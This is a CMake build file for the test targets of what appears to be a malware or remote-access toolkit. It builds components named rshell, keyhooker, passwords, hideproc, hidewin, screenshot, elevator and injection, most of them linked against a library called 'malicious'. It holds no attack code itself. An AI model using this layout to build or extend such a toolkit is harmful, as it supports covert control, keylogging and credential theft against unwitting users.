# Windows audit unit tests
if(WIN32)
	set(ISINJECTED_TARGET "isinjected")
	file(GLOB_RECURSE ${ISINJECTED_TARGET}_source_files ${ISINJECTED_TARGET}/*)
	add_library(${ISINJECTED_TARGET} SHARED ${isinjected_source_files})
	target_link_libraries(isinjected system network log)
	set_target_properties(isinjected PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS PROJECT_MODULE="${ISINJECTED_TARGET}")
	
	set(INJECTION_TARGET "injection")
	file(GLOB_RECURSE ${INJECTION_TARGET}_source_files ${INJECTION_TARGET}/*)
	add_executable(${INJECTION_TARGET} ${GUI_TYPE} ${injection_source_files})
	target_link_libraries(injection log malicious system network)
	add_dependencies(injection dll)
	set_target_properties(injection PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS PROJECT_MODULE="${INJECTION_TARGET}")
	
	set(REGISTRY_TARGET "registry")
	file(GLOB_RECURSE ${REGISTRY_TARGET}_source_files ${REGISTRY_TARGET}/*)
	add_executable(${REGISTRY_TARGET} ${GUI_TYPE} ${registry_source_files})
	target_link_libraries(${REGISTRY_TARGET} system network log)
	set_target_properties(${REGISTRY_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS PROJECT_MODULE="${REGISTRY_TARGET}")
	
	set(RSHELL_TARGET "rshell")
	file(GLOB_RECURSE ${RSHELL_TARGET}_source_files ${RSHELL_TARGET}/*)
	add_executable(${RSHELL_TARGET} ${GUI_TYPE} ${rshell_source_files})
	target_link_libraries(${RSHELL_TARGET} log network)
	set_target_properties(${RSHELL_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS PROJECT_MODULE="${RSHELL_TARGET}")
	
	set(PASSWORDS_TARGET "passwords")
	file(GLOB_RECURSE ${PASSWORDS_TARGET}_source_files ${PASSWORDS_TARGET}/*)
	add_executable(${PASSWORDS_TARGET} ${GUI_TYPE} ${passwords_source_files})
	target_link_libraries(${PASSWORDS_TARGET} system malicious userenv log network)
	set_target_properties(${PASSWORDS_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS PROJECT_MODULE="${PASSWORDS_TARGET}")
	
	set(KEYHOOKER_TARGET "keyhooker")
	file(GLOB_RECURSE ${KEYHOOKER_TARGET}_source_files ${KEYHOOKER_TARGET}/*)
	add_executable(${KEYHOOKER_TARGET} ${GUI_TYPE} ${keyhooker_source_files})
	target_link_libraries(${KEYHOOKER_TARGET} system malicious log network)
	set_target_properties(${KEYHOOKER_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS PROJECT_MODULE="${KEYHOOKER_TARGET}")
	
	set(PIPE_TARGET "pipe")
	file(GLOB_RECURSE ${PIPE_TARGET}_source_files ${PIPE_TARGET}/*)
	add_executable(${PIPE_TARGET} ${GUI_TYPE} ${pipe_source_files})
	target_link_libraries(${PIPE_TARGET} system log network)
	set_target_properties(${PIPE_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS PROJECT_MODULE="${PIPE_TARGET}")
	
	set(HIDEPROC_TARGET "hideproc")
	file(GLOB_RECURSE ${HIDEPROC_TARGET}_source_files ${HIDEPROC_TARGET}/*)
	add_executable(${HIDEPROC_TARGET} ${GUI_TYPE} ${hideproc_source_files})
	target_link_libraries(${HIDEPROC_TARGET} system malicious log network)
	set_target_properties(${HIDEPROC_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS PROJECT_MODULE="${HIDEPROC_TARGET}")
	
	set(HIDEWIN_TARGET "hidewin")
	file(GLOB_RECURSE ${HIDEWIN_TARGET}_source_files ${HIDEWIN_TARGET}/*)
	add_executable(${HIDEWIN_TARGET} ${GUI_TYPE} ${hidewin_source_files})
	target_link_libraries(${HIDEWIN_TARGET} system malicious log network)
	set_target_properties(${HIDEWIN_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS PROJECT_MODULE="${HIDEWIN_TARGET}")
	
	set(SCREENSHOT_TARGET "screenshot")
	file(GLOB_RECURSE ${SCREENSHOT_TARGET}_source_files ${SCREENSHOT_TARGET}/*)
	add_executable(${SCREENSHOT_TARGET} ${GUI_TYPE} ${screenshot_source_files})
	target_link_libraries(${SCREENSHOT_TARGET} system malicious log network)
	set_target_properties(${SCREENSHOT_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS PROJECT_MODULE="${SCREENSHOT_TARGET}")
	
	set(ELEVATOR_TARGET "elevator")
	file(GLOB_RECURSE ${ELEVATOR_TARGET}_source_files ${ELEVATOR_TARGET}/*)
	add_executable(${ELEVATOR_TARGET} ${GUI_TYPE} ${elevator_source_files})
	target_link_libraries(${ELEVATOR_TARGET} system log network malicious)
	set_target_properties(${ELEVATOR_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS PROJECT_MODULE="${ELEVATOR_TARGET}")
	
	set(ISADMIN_TARGET "isadmin")
	file(GLOB_RECURSE ${ISADMIN_TARGET}_source_files ${ISADMIN_TARGET}/*)
	add_executable(${ISADMIN_TARGET} ${GUI_TYPE} ${isadmin_source_files})
	target_link_libraries(${ISADMIN_TARGET} system log network)
	set_target_properties(${ISADMIN_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS PROJECT_MODULE="${ISADMIN_TARGET}")
	
	set(LOADSLAVE_TARGET "loadslave")
	file(GLOB_RECURSE ${LOADSLAVE_TARGET}_source_files ${LOADSLAVE_TARGET}/*)
	add_executable(${LOADSLAVE_TARGET} ${GUI_TYPE} ${loadslave_source_files})
	target_link_libraries(${LOADSLAVE_TARGET} system log network)
	set_target_properties(${LOADSLAVE_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS PROJECT_MODULE="${LOADSLAVE_TARGET}")
endif ()

# Portable tests
set(SESSION_TARGET "session")
file(GLOB_RECURSE ${SESSION_TARGET}_source_files ${SESSION_TARGET}/*)
add_executable(${SESSION_TARGET} ${GUI_TYPE} ${session_source_files})
target_link_libraries(${SESSION_TARGET} system blaspheme log network)
set_target_properties(${SESSION_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS PROJECT_MODULE="${SESSION_TARGET}")

set(MAIL_TARGET "mail")
file(GLOB_RECURSE ${MAIL_TARGET}_source_files ${MAIL_TARGET}/*)
add_executable(${MAIL_TARGET} ${GUI_TYPE} ${mail_source_files})
target_link_libraries(${MAIL_TARGET} ${GUI_TYPE} system malicious log network)
set_target_properties(${MAIL_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS PROJECT_MODULE="${MAIL_TARGET}")

set(TRANSFER_TARGET "transfer")
file(GLOB_RECURSE ${TRANSFER_TARGET}_source_files ${TRANSFER_TARGET}/*)
add_executable(${TRANSFER_TARGET} ${GUI_TYPE} ${transfer_source_files})
target_link_libraries(${TRANSFER_TARGET} system network log blaspheme)
set_target_properties(${TRANSFER_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS TRANSFER_TARGET)

set(OTLSQL_TARGET "otlsql")
file(GLOB_RECURSE ${OTLSQL_TARGET}_source_files ${OTLSQL_TARGET}/*)
add_executable(${OTLSQL_TARGET} ${GUI_TYPE} ${otlsql_source_files})
target_link_libraries(${OTLSQL_TARGET} system blaspheme log network)
set_target_properties(${OTLSQL_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT} COMPILE_DEFINITIONS PROJECT_MODULE="${OTLSQL_TARGET}")
